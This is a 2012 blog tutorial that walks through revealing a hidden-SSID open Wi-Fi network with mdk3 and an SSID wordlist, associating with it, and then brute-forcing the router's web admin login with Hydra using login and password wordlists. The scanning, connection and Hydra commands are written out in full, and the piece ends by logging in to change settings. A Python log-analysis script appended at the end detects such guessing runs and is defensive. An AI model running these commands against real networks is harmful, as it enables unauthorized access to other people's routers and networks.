Wednesday, September 12, 2012

Using Hydra after connecting to network


Tutorial provided by


After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login/password brute-force cracker that works from password or dictionary files.

First we find our network and do what is needed to log in.
In this case my test setup is:

* Eee PC 900, using the built in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no mac filtering enabled.

Code:
airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a

(using the -f option to slow down the channel hopping and the -t option to show only open networks)



After finding the network and the relevant info with airodump, I'll use my custom SSID wordlist to crack the hidden SSID:

Code:
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50

Depending on how often the AP sends beacons it can take a while to start; it will also show other networks that are broadcasting.


So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface, which is still in monitor mode, recreate it in managed mode,
then enter the information we have acquired to access the network and check for success:

Code:
airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0


Success! (see the link quality? we have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address, using dhcpcd with the -t option to set a time limit and -d to print some extra info on our MAC and the IP address we are given.
When that succeeds, a netstat shows which IP address the router (gateway) is using:

Code:
dhcpcd -t 30 -d ath0
netstat -nr


So now we know that the router can be found at IP address 192.168.200.1; let's try to log in using some standard password combinations.


No luck.


OK, so now we will attempt to use Hydra.
Note the address line in the browser: http://192.168.200.1/index.asp
I have wordlists stored on my sda1 drive, prepared from a combination of default passwords and commonly used ones.

Code:
hydra 192.168.200.1 -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp

This can take a while, and so to speed things up I tweaked my custom wordlist a bit.


Success!

So now, using the working login and password found above, we try to log in again:


We're in!


So now we are in the router and can make changes as we see fit!
And make sure that the security is increased.
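Increasing the security also means being able to notice a guessing run like the one above. The following is an added example written for this page, not part of the original tutorial: it reads a web server access log (Common Log Format, which is an assumption; most home routers do not expose one, but a reverse proxy or a router running third-party firmware can) and flags any source that racks up many 401 responses on the login page within a short window, plus the 200 that follows when a guess finally works. The log lines and addresses are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: client ident user [timestamp] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, int(status)

def detect_bruteforce(log_text, path="/index.asp", threshold=10, window_seconds=60):
    """Flag IPs with >= threshold 401s on `path` inside a sliding time window.
    Returns {ip: {"peak_failures": n, "success_after_flag": bool}}; a 200 on the
    same path from a flagged IP means the guessing likely worked and the
    router's admin password must be changed at once."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)  # ip -> timestamps of 401s still inside the window
    flagged = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec[2] != path:
            continue
        ip, when, _path, status = rec
        if status == 401:
            q = recent[ip]
            q.append(when)
            while when - q[0] > window:  # expire failures older than the window
                q.popleft()
            if len(q) >= threshold:
                hit = flagged.setdefault(ip, {"peak_failures": 0, "success_after_flag": False})
                hit["peak_failures"] = max(hit["peak_failures"], len(q))
        elif status == 200 and ip in flagged:
            flagged[ip]["success_after_flag"] = True
    return flagged

# Constructed sample log (addresses and times made up): one client hammers
# /index.asp the way an HTTP GET login brute force does and then gets a 200;
# a second client mistypes its password once and then logs in normally.
SAMPLE_LOG = "\n".join(
    [f'192.168.200.23 - - [12/Sep/2012:14:03:{s:02d} +0200] "GET /index.asp HTTP/1.0" 401 0'
     for s in range(12)]
    + ['192.168.200.23 - - [12/Sep/2012:14:03:13 +0200] "GET /index.asp HTTP/1.0" 200 1843',
       '192.168.200.50 - - [12/Sep/2012:14:05:00 +0200] "GET /index.asp HTTP/1.1" 401 0',
       '192.168.200.50 - - [12/Sep/2012:14:05:09 +0200] "GET /index.asp HTTP/1.1" 200 1843'])
```

Running `detect_bruteforce(SAMPLE_LOG)` reports only 192.168.200.23, with 12 failures in the window and a success afterwards; the single mistyped login from 192.168.200.50 stays below the threshold.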
